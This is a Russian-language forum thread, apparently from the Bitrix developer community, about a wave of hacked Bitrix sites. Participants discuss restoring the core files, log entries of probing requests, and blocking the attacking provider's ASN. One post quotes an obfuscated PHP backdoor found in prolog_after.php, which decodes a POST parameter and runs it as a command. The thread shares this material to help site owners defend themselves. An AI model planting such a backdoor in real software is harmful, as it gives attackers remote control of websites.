Разработчикам

Форум

Взломаны сайты в честь дня конституции украины

Евгений Жуков

Администратор

Сообщений: 9527 Баллов: 1848 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#461

03.03.2023 10:04:11

Цитата
написал: она сразу появлятся обратно

Она и должна. Этот папка управляемого кеша, смысла искать в ней вирусы нет, просто удаляете. Если в самом ядре нет закладок, новый кеш будет чист.

Не надо сверлить зубы через задний проход дрелью от Сваровски

Евгений Жуков

Администратор

Сообщений: 9527 Баллов: 1848 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#462

03.03.2023 10:05:38

Цитата
написал: по восстановлению файлов ядра Битрикс - статья в 2х словах/bitrix/admin/update_system.php?BX_SUPPORT_PROTOCOL3=Yгде 3 - день месяца (сегодня 3)

Алексей, а потом люди пойдут в ТП, потому что таким способом корректно восстановить ядро может только она. Я понимаю, что это куда меньшее зло по сравнению с вирусом, но все же.

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 231 Регистрация: 05.04.2011

Сертифицированный партнер

#463

03.03.2023 10:14:40

Цитата
Евгений Жуков написал: Алексей, а потом люди пойдут в ТП, потому что таким способом корректно восстановить ядро может только она. Я понимаю, что это куда меньшее зло по сравнению с вирусом, но все же.

для чего тогда в админке заложен такой функционал?

Кстати, раз уж Вы тут - без помощи ТП как то можно замечания по изменению файлов ядра самому фиксить?

просто сколько я не запускал монитор качества - эта проблема абсолютно везде всплывала, как правило все на неё "забивают"
разве что кроме совсем свежих проектов

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 427967

Заглянувший

Сообщений: 2 Регистрация: 03.02.2016

#464

03.03.2023 11:02:33

На наши серверы стали постить не на главную страницу, а на /bitrix/tools/spread.php.
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gex
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 " "Mozilla/5.0 (Windows NT x
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NTx
m185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT

Предварительно заблочили весь ASN https://asn.ipinfo.app/AS210644 провайдера aeza, заметили что оттуда оосновная масса вредоносных запросов поступает. Блокировали через правила в nginx (через include запрещающих правил типа https://asn.ipinfo.app/api/text/nginx/AS210644). Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Знаю, что костыль и что это не решение проблемы, но пока так..

Евгений Жуков

Администратор

Сообщений: 9527 Баллов: 1848 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#465

03.03.2023 11:17:07

Цитата
написал: для чего тогда в админке заложен такой функционал?

Для техподдержки. Этот функционал не является публичным, не эквивалентен корректной установке обновлений и требует ручных действий по окончании. Можете по форуму поискать темы на предмет двойного декларирования классов в модулях.

Цитата

написал:
Кстати, раз уж Вы тут - без помощи ТП как то можно замечания по изменению файлов ядра самому фиксить?просто сколько я не запускал монитор качества - эта проблема абсолютно везде всплывала, как правило все на неё "забивают"разве что кроме совсем свежих проектов

Поясните. Если речь идет о провале тестов на заведомо неизменном проекте - это наша проблема (тикет, фикс). Если о том, чтобы восстановить битый/зараженный файл - только в ТП.

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 231 Регистрация: 05.04.2011

Сертифицированный партнер

#466

03.03.2023 11:25:11

Цитата
Евгений Жуков написал: Если речь идет о провале тестов на заведомо неизменном проекте - это наша проблема (тикет, фикс)

"заведомо неизменном проекте" - улыбнуло, кто же такое в наше время может гарантировать

?
разве что, на закрытом сайте

Визуально вроде файлы неизменны, тикет уже в работе ... посмотрим чем закончится

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 4148622

Заглянувший

Сообщений: 3 Регистрация: 24.04.2020

#467

03.03.2023 11:40:47

Цитата
написал: Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Я тоже им абузу отправил 2 дня назад. Пока тишина.

Евгений Жуков

Администратор

Сообщений: 9527 Баллов: 1848 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#468

03.03.2023 14:10:07

Цитата
написал: "заведомо неизменном проекте" - улыбнуло, кто же такое в наше время может гарантировать ?разве что, на закрытом сайте

Развернули дистрибутив, накатили обновления, провалили тест - об этом случае речь.

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 1991131

Заглянувший

Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018

#469

03.03.2023 14:21:19

Цитата

написал:
На наши серверы стали постить не на главную страницу, а на /bitrix/tools/spread.php.
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gex
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 " "Mozilla/5.0 (Windows NT x
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NTx
m185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT

Предварительно заблочили весь ASN https://asn.ipinfo.app/AS210644 провайдера aeza, заметили что оттуда оосновная масса вредоносных запросов поступает. Блокировали через правила в nginx (через include запрещающих правил типа https://asn.ipinfo.app/api/text/nginx/AS210644 ). Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Знаю, что костыль и что это не решение проблемы, но пока так..

О, у меня тоже атаки с выданных ip от aeza

Пользователь 144171

Посетитель

Сообщений: 30 Баллов: 4 Регистрация: 02.10.2012

#470

03.03.2023 15:01:30

вот еще bitrix/modules/main/include/prolog_after.php

Код

define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){
        $APPLICATION->RestartBuffer();
        CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
        die();
}

и таких мест может быть миллион
выше был способ поиска по подстроке, похоже единственно реальный метод сейчас

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером